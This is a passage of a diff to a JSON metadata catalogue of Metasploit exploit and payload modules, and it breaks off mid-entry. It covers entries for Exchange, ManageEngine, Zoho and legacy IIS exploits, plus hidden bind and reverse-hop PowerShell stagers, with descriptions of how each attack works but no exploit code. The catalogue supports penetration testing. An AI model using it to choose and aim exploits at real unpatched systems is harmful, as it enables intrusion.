    "rank": 600,
    "disclosure_date": "2021-12-09",
@@ -138252,16 +140196,21 @@
      "Microsoft Security Response Center",
      "peterjson",
      "testanull",
-      "Grant Willcox"
+      "Grant Willcox",
+      "Spencer McIntyre",
+      "Markus Wulftange"
    ],
-    "description": "This vulnerability allows remote attackers to execute arbitrary code\n          on Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11\n          prior to Security Update 2, Exchange Server 2016 CU21 prior to\n          Security Update 3, and Exchange Server 2016 CU22 prior to\n          Security Update 2.\n\n          Note that authentication is required to exploit this vulnerability.\n\n          The specific flaw exists due to the fact that the deny list for the\n          ChainedSerializationBinder had a typo whereby an entry was typo'd as\n          System.Security.ClaimsPrincipal instead of the proper value of\n          System.Security.Claims.ClaimsPrincipal.\n\n          By leveraging this vulnerability, attacks can bypass the\n          ChainedSerializationBinder's deserialization deny list\n          and execute code as NT AUTHORITY\\SYSTEM.\n\n          Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019,\n          and Exchange Server 2016 CU22 SU0 on Windows Server 2016.",
+    "description": "This module exploits vulnerabilities within the ChainedSerializationBinder as used in\n          Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and\n          Exchange Server 2016 CU22 all prior to Mar22SU.\n\n          Note that authentication is required to exploit these vulnerabilities.",
    "references": [
      "CVE-2021-42321",
      "URL-https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321",
      "URL-https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7",
      "URL-https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169",
      "URL-https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398",
-      "URL-https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852"
+      "URL-https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852",
+      "CVE-2022-23277",
+      "URL-https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html",
+      "URL-https://testbnull.medium.com/note-nhanh-v%E1%BB%81-binaryformatter-binder-v%C3%A0-cve-2022-23277-6510d469604c"
    ],
    "platform": "Windows",
    "arch": "cmd, x86, x64",
@@ -138286,10 +140235,10 @@
      "Windows Dropper",
      "PowerShell Stager"
    ],
-    "mod_time": "2022-03-17 09:56:51 +0000",
-    "path": "/modules/exploits/windows/http/exchange_chainedserializationbinder_denylist_typo_rce.rb",
+    "mod_time": "2022-08-17 17:36:31 +0000",
+    "path": "/modules/exploits/windows/http/exchange_chainedserializationbinder_rce.rb",
    "is_install_path": true,
-    "ref_name": "windows/http/exchange_chainedserializationbinder_denylist_typo_rce",
+    "ref_name": "windows/http/exchange_chainedserializationbinder_rce",
    "check": true,
    "post_auth": true,
    "default_credential": false,
@@ -141852,6 +143801,68 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_windows/http/manageengine_adaudit_plus_cve_2022_28219": {
+    "name": "ManageEngine ADAudit Plus CVE-2022-28219",
+    "fullname": "exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-06-29",
+    "type": "exploit",
+    "author": [
+      "Naveen Sunkavally",
+      "Ron Bowes"
+    ],
+    "description": "This module exploits CVE-2022-28219, which is a pair of\n          vulnerabilities in ManageEngine ADAudit Plus versions before build\n          7060: a path traversal in the /cewolf endpoint, and a blind XXE in,\n          to upload and execute an executable file.",
+    "references": [
+      "CVE-2022-28219",
+      "URL-https://www.horizon3.ai/red-team-blog-cve-2022-28219/",
+      "URL-https://attackerkb.com/topics/Zx3qJlmRGY/cve-2022-28219/rapid7-analysis",
+      "URL-https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 8081,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows Command"
+    ],
+    "mod_time": "2022-08-05 11:34:46 +0000",
+    "path": "/modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/manageengine_adaudit_plus_cve_2022_28219",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/manageengine_adselfservice_plus_cve_2021_40539": {
    "name": "ManageEngine ADSelfService Plus CVE-2021-40539",
    "fullname": "exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539",
@@ -143477,7 +145488,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-06-29 19:10:52 +0000",
    "path": "/modules/exploits/windows/http/osb_uname_jlist.rb",
    "is_install_path": true,
    "ref_name": "windows/http/osb_uname_jlist",
@@ -146179,6 +148190,72 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/http/zoho_password_manager_pro_xml_rpc_rce": {
+    "name": "Zoho Password Manager Pro XML-RPC Java Deserialization",
+    "fullname": "exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-06-24",
+    "type": "exploit",
+    "author": [
+      "Vinicius",
+      "Y4er",
+      "Grant Willcox"
+    ],
+    "description": "This module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro\n          before 12101 and PAM360 before 5510. Unauthenticated attackers can send a\n          crafted XML-RPC request containing malicious serialized data to /xmlrpc to\n          gain RCE as the SYSTEM user.",
+    "references": [
+      "CVE-2022-35405",
+      "URL-https://xz.aliyun.com/t/11578",
+      "URL-https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html",
+      "URL-https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm"
+    ],
+    "platform": "Windows",
+    "arch": "cmd, x64",
+    "rport": 7272,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows EXE Dropper",
+      "Windows Command",
+      "Windows Powershell"
+    ],
+    "mod_time": "2022-08-02 14:27:27 +0000",
+    "path": "/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/zoho_password_manager_pro_xml_rpc_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/ibm/ibm_was_dmgr_java_deserialization_rce": {
    "name": "IBM Websphere Application Server Network Deployment Untrusted Data Deserialization Remote Code Execution",
    "fullname": "exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce",
@@ -146344,7 +148421,7 @@
    "author": [
      "hdm <x@hdm.io>"
    ],
-    "description": "This exploits a buffer overflow in the request processor of\n        the Internet Printing Protocol ISAPI module in IIS. This\n        module works against Windows 2000 service pack 0 and 1. If\n        the service stops responding after a successful compromise,\n        run the exploit a couple more times to completely kill the\n        hung process.",
+    "description": "This exploits a buffer overflow in the request processor of the\n          Internet Printing Protocol ISAPI module in IIS. This module\n          works against Windows 2000 Server and Professional SP0-SP1.\n\n          If the service stops responding after a successful compromise,\n          run the exploit a couple more times to completely kill the\n          hung process.",
    "references": [
      "CVE-2001-0241",
      "OSVDB-3323",
@@ -146353,18 +148430,43 @@
      "URL-https://seclists.org/lists/bugtraq/2001/May/0005.html"
    ],
    "platform": "Windows",
-    "arch": "",
+    "arch": "x86",
    "rport": 80,
    "autofilter_ports": [
-
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
    ],
    "autofilter_services": [
-
+      "http",
+      "https"
    ],
    "targets": [
-      "Windows 2000 English SP0-SP1"
+      "Windows 2000 SP0-SP1 (Arabic)",
+      "Windows 2000 SP0-SP1 (Czech)",
+      "Windows 2000 SP0-SP1 (Chinese)",
+      "Windows 2000 SP0-SP1 (Dutch)",
+      "Windows 2000 SP0-SP1 (English)",
+      "Windows 2000 SP0-SP1 (French)",
+      "Windows 2000 SP0-SP1 (Finnish)",
+      "Windows 2000 SP0-SP1 (German)",
+      "Windows 2000 SP0-SP1 (Korean)",
+      "Windows 2000 SP0-SP1 (Hungarian)",
+      "Windows 2000 SP0-SP1 (Italian)",
+      "Windows 2000 SP0-SP1 (Portuguese)",
+      "Windows 2000 SP0-SP1 (Spanish)",
+      "Windows 2000 SP0-SP1 (Swedish)",
+      "Windows 2000 SP0-SP1 (Turkish)",
+      "Windows 2000 Pro SP0 (Greek)",
+      "Windows 2000 Pro SP1 (Greek)"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-07-09 01:36:10 +0000",
    "path": "/modules/exploits/windows/iis/ms01_023_printer.rb",
    "is_install_path": true,
    "ref_name": "windows/iis/ms01_023_printer",
@@ -146372,6 +148474,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-service-down"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -146388,7 +148499,7 @@
    "author": [
      "jduck <jduck@metasploit.com>"
    ],
-    "description": "This module will execute an arbitrary payload on a Microsoft IIS installation\n          that is vulnerable to the CGI double-decode vulnerability of 2001.\n\n          NOTE: This module will leave a metasploit payload in the IIS scripts directory.",
+    "description": "This module will execute an arbitrary payload on a Microsoft IIS installation\n          that is vulnerable to the CGI double-decode vulnerability of 2001.\n\n          This module has been tested successfully on:\n\n          Windows 2000 Professional (SP0) (EN);\n          Windows 2000 Professional (SP1) (AR);\n          Windows 2000 Professional (SP1) (CZ);\n          Windows 2000 Server (SP0) (FR);\n          Windows 2000 Server (SP1) (EN); and\n          Windows 2000 Server (SP1) (SE).\n\n          Note: This module will leave a Metasploit payload exe in the IIS scripts directory.",
    "references": [
      "CVE-2001-0333",
      "OSVDB-556",
@@ -146400,15 +148511,25 @@
    "arch": "",
    "rport": 80,
    "autofilter_ports": [
-
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
    ],
    "autofilter_services": [
-
+      "http",
+      "https"
    ],
    "targets": [
-      "Automatic"
+      "Windows (Dropper)",
+      "Windows (Command)"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-07-03 18:22:55 +0000",
    "path": "/modules/exploits/windows/iis/ms01_026_dbldecode.rb",
    "is_install_path": true,
    "ref_name": "windows/iis/ms01_026_dbldecode",
@@ -146416,6 +148537,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
    },
    "session_types": false,
    "needs_cleanup": true
@@ -146517,7 +148648,7 @@

    ],
    "rank": 300,
-    "disclosure_date": "2002-11-20",
+    "disclosure_date": "2002-11-02",
    "type": "exploit",
    "author": [
      "aushack <patrick@osisecurity.com.au>"
@@ -146531,7 +148662,7 @@
      "URL-http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html"
    ],
    "platform": "Windows",
-    "arch": "",
+    "arch": "x86",
    "rport": 80,
    "autofilter_ports": [
      80,
@@ -146549,9 +148680,18 @@
      "https"
    ],
    "targets": [
-      "Windows 2000 Pro English SP0"
+      "Windows 2000 Pro SP0-SP3 (English)",
+      "Windows 2000 Pro SP0 (Korean)",
+      "Windows 2000 Pro SP0 (Dutch)",
+      "Windows 2000 Pro SP0 (Finnish)",
+      "Windows 2000 Pro SP0 (Turkish)",
+      "Windows 2000 Pro SP0-SP1 (Greek)",
+      "Windows 2000 Pro SP1 (Arabic)",
+      "Windows 2000 Pro SP1 (Czech)",
+      "Windows 2000 Pro SP2 (French)",
+      "Windows 2000 Pro SP2 (Portuguese)"
    ],
-    "mod_time": "2017-11-09 03:00:24 +0000",
+    "mod_time": "2022-07-15 00:15:56 +0000",
    "path": "/modules/exploits/windows/iis/ms02_065_msadc.rb",
    "is_install_path": true,
    "ref_name": "windows/iis/ms02_065_msadc",
@@ -146559,6 +148699,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-service-down"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -146575,15 +148724,16 @@
    "author": [
      "hdm <x@hdm.io>"
    ],
-    "description": "This exploits a buffer overflow in NTDLL.dll on Windows 2000\n        through the SEARCH WebDAV method in IIS. This particular\n        module only works against Windows 2000. It should have a\n        reasonable chance of success against any service pack.",
+    "description": "This exploits a buffer overflow in NTDLL.dll on Windows 2000\n          through the SEARCH WebDAV method in IIS. This particular\n          module only works against Windows 2000. It should have a\n          reasonable chance of success against SP0 to SP3.",
    "references": [
      "CVE-2003-0109",
      "OSVDB-4467",
      "BID-7116",
+      "PACKETSTORM-30939",
      "MSB-MS03-007"
    ],
    "platform": "Windows",
-    "arch": "",
+    "arch": "x86",
    "rport": 80,
    "autofilter_ports": [
      80,
@@ -146603,7 +148753,7 @@
    "targets": [
      "Automatic Brute Force"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-07-07 20:31:57 +0000",
    "path": "/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb",
    "is_install_path": true,
    "ref_name": "windows/iis/ms03_007_ntdll_webdav",
@@ -146611,6 +148761,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-service-down"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -146656,7 +148815,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-06-29 19:10:52 +0000",
    "path": "/modules/exploits/windows/iis/msadc.rb",
    "is_install_path": true,
    "ref_name": "windows/iis/msadc",
@@ -150724,7 +152883,7 @@
      "EDB-15589"
    ],
    "platform": "Windows",
-    "arch": "x86, x64",
+    "arch": "",
    "rport": null,
    "autofilter_ports": [

@@ -150733,9 +152892,10 @@

    ],
    "targets": [
-      "Windows Vista, 7, and 2008"
+      "Windows Vista / 7 / 2008 (Dropper)",
+      "Windows Vista / 7 / 2008 (Command)"
    ],
-    "mod_time": "2021-09-08 21:56:02 +0000",
+    "mod_time": "2022-08-19 15:19:28 +0000",
    "path": "/modules/exploits/windows/local/ms10_092_schelevator.rb",
    "is_install_path": true,
    "ref_name": "windows/local/ms10_092_schelevator",
@@ -150743,6 +152903,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -152658,7 +154828,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2021-09-08 21:56:02 +0000",
+    "mod_time": "2022-06-29 19:18:47 +0000",
    "path": "/modules/exploits/windows/local/run_as.rb",
    "is_install_path": true,
    "ref_name": "windows/local/run_as",
@@ -153926,7 +156096,7 @@
    "targets": [
      "Windows 2003 (with tftp client available)"
    ],
-    "mod_time": "2021-09-08 21:56:02 +0000",
+    "mod_time": "2022-06-29 19:10:52 +0000",
    "path": "/modules/exploits/windows/misc/altiris_ds_sqli.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/altiris_ds_sqli",
@@ -158976,7 +161146,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-06-29 19:10:52 +0000",
    "path": "/modules/exploits/windows/mssql/mssql_payload.rb",
    "is_install_path": true,
    "ref_name": "windows/mssql/mssql_payload",
@@ -162580,7 +164750,7 @@
    "targets": [
      "Windows 2000 SP2-SP4 + Windows XP SP0-SP1"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-07-10 00:07:26 +0000",
    "path": "/modules/exploits/windows/smb/ms04_007_killbill.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms04_007_killbill",
@@ -170400,7 +172570,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-19 11:28:26 +0000",
+    "mod_time": "2022-06-15 13:25:25 +0000",
    "path": "/modules/payloads/singles/cmd/windows/jjs_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/jjs_reverse_tcp",
@@ -170438,7 +172608,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/adduser",
@@ -170450,6 +172620,1056 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "payload_cmd/windows/powershell/custom/bind_hidden_ipknock_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Hidden Bind Ipknock TCP Stager",
+    "fullname": "payload/cmd/windows/powershell/custom/bind_hidden_ipknock_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "Borja Merino <bmerinofe@gmail.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/bind_hidden_ipknock_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/bind_hidden_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Hidden Bind TCP Stager",
+    "fullname": "payload/cmd/windows/powershell/custom/bind_hidden_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "Borja Merino <bmerinofe@gmail.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/bind_hidden_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/bind_ipv6_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)",
+    "fullname": "payload/cmd/windows/powershell/custom/bind_ipv6_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for an IPv6 connection (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/bind_ipv6_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/bind_ipv6_tcp_uuid": {
+    "name": "Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)",
+    "fullname": "payload/cmd/windows/powershell/custom/bind_ipv6_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/bind_ipv6_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/bind_named_pipe": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x86 Bind Named Pipe Stager",
+    "fullname": "payload/cmd/windows/powershell/custom/bind_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "UserExistsError"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a pipe connection (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/bind_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/bind_nonx_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (No NX or Win7)",
+    "fullname": "payload/cmd/windows/powershell/custom/bind_nonx_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "vlad902 <vlad902@gmail.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection (No NX)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/bind_nonx_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/bind_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (Windows x86)",
+    "fullname": "payload/cmd/windows/powershell/custom/bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/bind_tcp_rc4": {
+    "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/cmd/windows/powershell/custom/bind_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "RageLtMan"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/bind_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/bind_tcp_uuid": {
+    "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x86)",
+    "fullname": "payload/cmd/windows/powershell/custom/bind_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection with UUID Support (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/bind_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/find_tag": {
+    "name": "Powershell Exec, Windows shellcode stage, Find Tag Ordinal Stager",
+    "fullname": "payload/cmd/windows/powershell/custom/find_tag",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "skape <mmiller@hick.org>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Use an established connection",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/find_tag",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_hop_http": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse Hop HTTP/HTTPS Stager",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_hop_http",
